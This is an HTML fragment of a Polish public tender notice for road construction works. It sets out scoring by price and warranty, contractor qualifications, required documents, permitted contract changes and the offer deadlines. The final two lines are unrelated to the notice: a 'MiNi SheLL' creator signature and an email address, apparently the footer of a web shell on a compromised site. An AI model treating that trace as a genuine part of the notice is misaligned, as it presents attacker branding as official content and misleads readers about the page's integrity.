Kryteriami oceny ofert są:<br/><br/>1. Oferowana cena – 60%<br/>W powyższym kryterium oceniana będzie cena brutto oferty. Maksymalną ilość punktów – 60 pkt. otrzyma oferta z najniższą ceną, pozostałe oferty będą oceniane według następującego wzoru: <br/> Najniższa cena <br/>C = ------------------------------ x 60 pkt<br/> Cena badanej oferty<br/>gdzie: C – ilość punktów, jaką dana oferta otrzyma za cenę oferty brutto<br/><br/><br/>2. Okres gwarancji – 40%<br/>W powyższym kryterium oceniany będzie długość okresu wymaganej gwarancji na roboty budowlane. Oferty będą oceniane według następującego następującej metodologii: <br/>PG = ilość punktów za wydłużenie okresu gwarancji<br/><br/>Długość oferowanej gwarancji	Liczba pkt<br/>Gwarancja minimalna: tj. 56 miesięcy	0 pkt<br/>Okres gwarancji minimum 58 miesięcy	38 pkt<br/>Okres gwarancji minimum 60 miesięcy	40 pkt<br/><br/>Oferty z gwarancją krótszą od minimalnej zostaną odrzucone. Dla oferty bez podania okresu wydłużenia gwarancji zamawiający przyjmie gwarancję minimalną. Podanie w ofercie dłuższego niż maksymalny punktowany okresu gwarancji spowoduje przyznanie wykonawcy maksymalną liczbę punktów w tym kryterium (ale do umowy zostanie wpisana gwarancja oferowana).<br/><br/>Wykonawca udzieli gwarancji zgodnie z zapisami we wzorze umowy stanowiącym załącznik Nr 5 do SWZ.	<br/><br/>2) Łączna ilość punktów otrzymanych przez wykonawcę będzie sumą punktów przyznanych w poszczególnych kryteriach.<br/>PO = C + PG<br/>Gdzie <br/>PO – suma punktów przyznanych danej ofercie<br/>C – ilość punktów w kryterium Cena<br/> PG = ilość punktów w kryterium Okres gwarancji<br/><br/>3) Zamawiający wybierze ofertę, która uzyska największą liczbę punktów.<br/>4) Jeżeli nie można wybrać oferty najkorzystniejszej z uwagi na to, że dwie lub więcej ofert przedstawia taki sam bilans ceny i innych kryteriów oceny ofert, Zamawiający spośród tych ofert wybiera ofertę z najniższą ceną. Zamawiający wzywa Wykonawców, którzy złożyli oferty o takiej samej najniższej cenie, do złożenia w terminie określonym przez Zamawiającego ofert dodatkowych w zakresie dotyczącym ceny. Wykonawcy, składając oferty dodatkowe, nie mogą przedstawić ceny wyższej niż w złożonych ofertach.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Wykonawcy ubiegający się o udzielenie przedmiotowego zamówienia muszą spełniać warunki udziału w postępowaniu dotyczące:<br/>5.1	Kompetencji lub uprawnień do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów – Zamawiający nie precyzuje wymagań w zakresie tego warunku.<br/>5.2	Sytuacji ekonomicznej lub finansowej – Zamawiający nie precyzuje wymagań w zakresie tego warunku.<br/>5.3	Zdolności technicznej lub zawodowej:<br/>Warunek uznaje się za spełniony, jeżeli Wykonawcy zrealizowali w ciągu ostatnich 5 lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, minimum jedno zamówienie dotyczące budowy, przebudowy lub modernizacji dróg o wartości nie mniejszej niż 4 000 000 zł brutto (słownie: cztery miliony złotych).<br/>Okres wyrażony powyżej w latach (w okresie ostatnich 5 lat) liczy się wstecz od dnia, w którym upływa termin składania ofert.<br/>Wartość podaną w walutach innych niż PLN wykonawca przeliczy wg średniego kursu NBP dla danej waluty z dnia publikacji ogłoszenia o zamówieniu w BZP. Jeżeli w dniu zamieszczenia ogłoszenia o zamówieniu NBP nie opublikował informacji o średnim kursie walut, zamawiający dokona odpowiednich przeliczeń wg średniego kursu z pierwszego kolejnego dnia, w którym NBP opublikował ww. informacje.<br/>Jeżeli wykonawca powołuje się na doświadczenie w realizacji robót budowlanych, wykonywanych wspólnie z innymi wykonawcami, wykaz dotyczy robót, w których wykonaniu wykonawca ten bezpośrednio uczestniczył.<br/><br/>Zamawiający wezwie Wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym, nie krótszym niż 5 dni terminie wykazu robót budowlanych według załącznika nr 8 do SWZ, potwierdzających zdolność techniczną lub zawodową Wykonawcy do wykonania zamówienia.<br/>Wykaz robót budowlanych wraz z podaniem ich rodzaju, wartości, daty, miejsca wykonania i podmiotów, na rzecz których roboty te zostały wykonane z załączeniem dowodów określających czy te roboty budowlane zostały wykonane należycie, w szczególności informacji o tym czy roboty zostały wykonane zgodnie z przepisami prawa budowlanego i prawidłowo ukończone, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego roboty budowlane były wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych dokumentów -inne dokumenty. <br/>Wykonawcy wspólnie ubiegający się o udzielenie zamówienia muszą wykazać, że powyższy warunek spełnia co najmniej jeden Wykonawca.<br/><br/>	Warunek uznaje się za spełniony, jeżeli Wykonawca wykaże, że dysponuje osobami, którym zostanie powierzone wykonanie niniejszego zamówienia na stanowisku kierownik budowy posiadający uprawnienia budowlane do kierowania robotami budowlanymi w branży drogowej lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów i doświadczenie zawodowe minimum 3 lata od uzyskania uprawnień na stanowisku kierownika budowy. <br/> Okres wyrażony powyżej w latach liczy się wstecz od dnia, w którym upływa termin składania ofert.<br/> Zamawiający wezwie Wykonawcę, którego oferta została najwyżej oceniona, do złożenia wykazu osób, o których mowa powyżej, w wyznaczonym, nie krótszym niż 5 dni terminie według załącznika nr 7 do SWZ.<br/> Wykonawcy wspólnie ubiegający się o udzielenie zamówienia muszą wykazać, że łącznie spełniają powyższy warunek. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">a)	oświadczenia wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 ustawy Prawo zamówień publicznych, w zakresie podstaw wykluczenia z postępowania wskazanych przez Zamawiającego, według załącznika nr 6 do SWZ.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">a)	wykaz robót budowlanych według załącznika nr 8 do SWZ, potwierdzających zdolność techniczną lub zawodową Wykonawcy do wykonania zamówienia,<br/>b)	wykaz osób na stanowisku kierownik budowy, którym zostanie powierzone wykonanie zamówienia, według załącznika nr 7 do SWZ.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający nie wymaga od Wykonawców przedłożenia przedmiotowych środków dowodowych <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Oferta musi zawierać następujące oświadczenia i dokumenty:<br/>1.	Formularz oferty sporządzony wg wzoru Formularza oferty stanowiącego załącznik nr 2. W przypadku złożenia oferty na innym formularzu niż załącznik nr 2 do SWZ, powinien on zawierać wszystkie wymagane informacje określone w tym załączniku. Formularz generowany przez Platformę Zakupową jest „narzędziem technicznym” niezbędnym do złożenia oferty na Platformie, nie stanowi on jednak faktycznego formularza ofertowego. Formularz oferty nie podlega uzupełnieniu. <br/>2.	Oświadczenie o niepodleganiu wykluczeniu i spełnianiu warunków udziału w postępowaniu, stanowiące załącznik nr 3 do SWZ.<br/>3.	W przypadku wspólnego ubiegania się o zamówienie przez wykonawców, oświadczenie, o którym mowa w pkt 11.1.2 według wzoru stanowiącego załącznik nr 3 do SWZ składa każdy z wykonawców wspólnie ubiegających się o zamówienie.<br/>4.	Wykonawca, który polega na zdolnościach podmiotów udostępniających zasoby, na zasadach określonych w art. 118 ustawy Pzp, musi udowodnić zamawiającemu, że realizując zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów, w szczególności dołączając do oferty zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji zamówienia, zgodnie z załącznikiem nr 4b do SWZ. Wykonawca może przedstawić też inny środek dowodowy potwierdzający, że wykonawca realizując zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów. Z zobowiązania lub innych dokumentów potwierdzających udostępnienie zasobów przez inne podmioty musi bezspornie i jednoznacznie wynikać w szczególności: <br/>a)	zakres dostępnych wykonawcy zasobów podmiotu udostępniającego zasoby,<br/>b)	sposób i okres udostępnienia wykonawcy i wykorzystania przez niego zasobów podmiotu udostępniającego te zasoby przy wykonywaniu zamówienia,<br/>c)	czy i w jakim zakresie podmiot udostępniający zasoby, na zdolnościach którego wykonawca polega w odniesieniu do warunku udziału w postępowaniu dotyczących doświadczenia, zrealizuje roboty budowlane lub usługi, których wskazane zdolności dotyczą.<br/>5.	W odniesieniu do warunków udziału w postępowaniu dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia Wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z wykonawców, którzy wykonają roboty budowlane lub usługi, do realizacji których te zdolności są wymagane - w takim przypadku Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które roboty budowlane lub usługi wykonają poszczególni wykonawcy. Wzór oświadczenia stanowi załącznik nr 4c do SWZ.<br/>6.	W celu potwierdzenia, że osoba działająca w imieniu wykonawcy jest umocowana do jego reprezentowania, zamawiający żąda od wykonawcy złożenia wraz z ofertą odpisu lub informacji z Krajowego Rejestru Sądowego, Centralnej Ewidencji i Informacji o Działalności Gospodarczej lub innego właściwego rejestru, przy czym, Wykonawca nie jest zobowiązany do złożenia tych dokumentów, jeżeli zamawiający może je uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych, o ile wykonawca wskazał dane umożliwiające dostęp do tych dokumentów. Informację w tym zakresie wykonawca uzupełnia w załączniku nr 3 lub 4a do SWZ.<br/>7.	Pełnomocnictwo lub inny dokument potwierdzający umocowanie do reprezentowania wykonawcy - jeżeli w imieniu wykonawcy działa osoba, której umocowanie do jego reprezentowania nie wynika z dokumentów, o których mowa w ust. 6. W przypadku wspólnego ubiegania się o zamówienie przez wykonawców pełnomocnictwo podpisane przez osoby upoważnione do składania oświadczeń woli każdego ze wspólników. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1 Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku wszyscy Wykonawcy wspólnie ubiegający się o udzielenie zamówienia ustanawiają pełnomocnika do reprezentowania ich w postępow. albo do reprezentowania i zawarcia umowy w sprawie zamówienia publicznego. Do oferty należy dołączyć stosowne pełnomocnictwo, podpisane przez osoby upoważnione do składania oświadczeń woli w imieniu każdego ze wspólników.<br/>Pełnomocnictwo musi być złożone w oryginale w takiej samej formie, jak składana oferta (tj. w formie elektronicznej (opatrzone kwalifik. podpisem elektronicznym) lub postaci elektronicznej opatrzone podpisem zaufanym lub podpisem osobistym). Dopuszcza się także złożenie elektronicznej kopii (skanu) pełnomocnictwa sporządzonego uprzednio w formie pisemnej, w formie elektronicznego poświadczenia sporządzonego stosownie z art. 97 § 2 ustawy z dnia 14 lutego 1991 r. - Prawo o notariacie, które to poświadczenie notariusz opatruje kwalifikowanym podpisem elektronicznym, bądź też poprzez opatrzenie skanu pełnomocnictwa sporządz. uprzednio w formie pisemnej kwalifik. podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym mocodawcy.<br/>2 Oświadczenia i dokumenty potw. brak podstaw do wykluczenia z postępow., o których mowa w rozdziale 6 SWZ składa każdy z Wykonawców wspólnie ubieg. się o zamów. wg załącznika nr 3 do SWZ. Oświadczenia potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w zakresie, w jakim każdy z wykonawców wykazuje spełnianie war. udziału w postęp.<br/>3 W odniesieniu do warunków udziału w postęp. dot.wykształcenia, kwalifikacji zawodowych lub doświadczenia Wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z wykonawców, którzy wykonają roboty bud. lub usługi, do realizacji których te zdolności są wymagane. W takim przypadku Wykonawcy wspólnie ubiegający<br/>się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które roboty budowlane lub usługi wykonają poszczególni wykonawcy. Wzór oświadczenia stanowi załącznik nr 4c do SWZ.<br/>4 Wykonawca, który powołuje się na zasoby innych podm., w celu wykazania braku istnienia wobec nich podstaw wykluczenia oraz spełniania, w zakresie, w jakim powołuje się na ich zasoby, warunków udziału w postępow. - zamieszcza inform. o tych podmiotach w ośw., o których mowa w pkt 1.<br/>5 Wykonawca, który zamierza powierzyć wykonanie części zamówienia podwykonawcom, w celu wykazania braku istnienia wobec nich podstaw wykluczenia z postępowania – zamieszcza informacje o tych podmiotach w oświadczeniach, o których mowa w pkt 1.<br/>6 W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców oświadczenia składa każdy z Wykonawców wspólnie ubiegających się o zamówienie, według wzoru stanowiącego załącznik nr 3 do SWZ. Dokumenty te potwierdzają spełnienie warunków udziału w postępowaniu oraz brak podstaw wykluczenia w zakresie, w którym każdy z Wykonawców<br/>wykazuje spełnienie warunków udziału w postępowaniu oraz brak podstaw wykluczenia.<br/>7 Wykonawca, który polega na zdolnościach innych podm. w celu potw. spełniania warunków udziału w postępowaniu, musi udowodnić Zamawiającemu, że realizując zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów, w szczególności przedstawiając zobowiązanie tych podm. do oddania mu do dyspozycji niezbędnych zasobów na potrzeby<br/>realizacji zamówienia, które Wykonawca zobowiązany jest dołączyć do oferty. Wzór zobowiązania stanowi załącznik nr 4b do SWZ. Z dokumentu (np. zobowiązania), o którym mowa w niniejszym punkcie musi wynikać w szczególności:<br/>a) zakres dostępnych Wykonawcy zasobów innego podmiotu;<br/>b) sposób wykorzystania zasobów innego podmiotu, przez Wykonawcę, przy wykonywaniu zamówienia publicznego;<br/>c) czy i w jakim zakresie podmiot udostępniający zasoby, na zdolnościach którego wykonawca polega w odniesieniu do war.udziału w postępow. dot. wykształcenia, kwalifikacji zawod. lub dośw., zrealizuje usługi, których wskazane zdolności dotyczą. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.	Zamawiający dopuszcza możliwość zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy na poniższych warunkach:<br/>1)	w zakresie wynagrodzenia:<br/>a)	w przypadku zmiany stawki podatku VAT przez władzę ustawodawczą w trakcie trwania Umowy, wynikającej ze zmiany ustawy o podatku od towarów i usług oraz podatku akcyzowego, określonej w § 5 ust. 1 Umowy;<br/>b)	w przypadku ustawowej zmiany wysokości minimalnego wynagrodzenia za pracę ustalonego na podstawie art. 2 ust. 3 – 5 ustawy z dnia 10 października 2002 r. o minimalnym wynagrodzeniu za pracę – jeżeli zmiany te będą miały wpływ na koszty wykonywania zamówienia przez Wykonawcę – o wartość wynikającą z tych zmian;<br/>c)	w przypadku ustawowej zmiany zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu lub wysokości stawki składki na ubezpieczenie społeczne lub zdrowotne – jeżeli zmiany te będą miały wpływ na koszty wykonywania zamówienia przez Wykonawcę – o wartość wynikającą z tych zmian.<br/>d)	w przypadku ustawowej zmiany zasad gromadzenia i wysokości wpłat do pracowniczych planów kapitałowych, o których mowa w ustawie z dnia 4 października 2018 r. o pracowniczych planach kapitałowych – o wartość wynikającą z tych zmian, <br/>e)	Zamawiający dopuszcza możliwość zmiany wynagrodzenia Wykonawcy w przypadku zmiany cen materiałów związanych z realizacją zamówienia (waloryzacja). Zamawiający określa, że: <br/>1)	wysokość wynagrodzenia wykonawcy może ulec zmianie w przypadku zmiany cen betonu asfaltowego AC11S i AC 11W<br/>2)	wynagrodzenie będzie podlegało waloryzacji począwszy od 1 dnia pełnego miesiąca kalendarzowego od złożenia kosztorysu, gdy wartość zmiany cen ww. materiałów przekroczy 100 % w stosunku do stawek przyjętych przez wykonawcę w ww. kosztorysie i utrzyma się przez okres 4 miesięcy,<br/>3)	waloryzacja będzie odbywać się w oparciu o wskaźnik wzrostu cen towarów i usług konsumpcyjnych, publikowany przez Prezesa Głównego Urzędu Statystycznego w sprawie średniorocznego wskaźnika cen towarów i usług konsumpcyjnych, <br/>4)	przez zmianę ceny materiałów rozumie się wzrost odpowiednio cen lub kosztów, względem ceny przyjętych przez Wykonawcę. Wykonawca będzie uprawniony do waloryzacji wynagrodzenia wyłącznie w sytuacji wykazania Zamawiającemu, że na dzień zaistnienia podstaw do waloryzacji, ceny wskazane w kosztorysie ofertowym wykonawcy są niższe aniżeli ceny produkcji budowlano - montażowej, publikowane przez Prezesa Głównego Urzędu Statystycznego w sprawie średniorocznego wskaźnika cen towarów i usług konsumpcyjnych , <br/>5)	wynagrodzenie będzie podlegało waloryzacji maksymalnie do 10 % wynagrodzenia, o którym mowa w §5 ust. 1 umowy, <br/>6)	postanowień umownych w zakresie waloryzacji nie stosuje się od chwili osiągnięcia limitu, o którym mowa powyżej,<br/>7)	zmiana wysokości wynagrodzenia opisana w niniejszym ustępie następuje w przypadku ziszczenia się powyższych warunków.<br/><br/>2)	w zakresie terminu:<br/>a)	Zaistnienia okoliczności leżących po stronie Zamawiającego, w szczególności spowodowanych sytuacją prawną, finansową, zdolnościami płatniczymi, warunkami organizacyjnymi i technicznymi, przestojami lub opóźnieniami (np. przedłużająca się procedura Pzp) lub okolicznościami, które nie były możliwe do przewidzenia w chwili zawarcia umowy,<br/>b)	W przypadku wystąpienia siły wyższej (tj. działania i zamieszki wojenne, ataki terrorystyczne, klęski żywiołowe spowodowane przez burze, trzęsienia ziemi, ciągłe opady deszczu powyżej 14 dni w okresie czerwiec – wrzesień, ekonomiczne następstwa globalnego kryzysu finansowego i inne), uniemożliwiającej wykonanie zamówienia w terminie umownym lub powodującej zmianę zakresu robót;<br/><br/>Ze względu na ograniczoną liczbę znaków w niniejszej części formularza ogłoszenia o zamówieniu, pełna informacja o zakresie zmian umowy i warunkach ich wprowadzenia znajduje się w §18 wzoru umowy (załącznik nr 5 do SWZ). <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-12-07 12:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://zakrzowek.ezamawiajacy.pl/pn/zakrzowek/demand/130935/notice/public/details</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-12-07 12:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com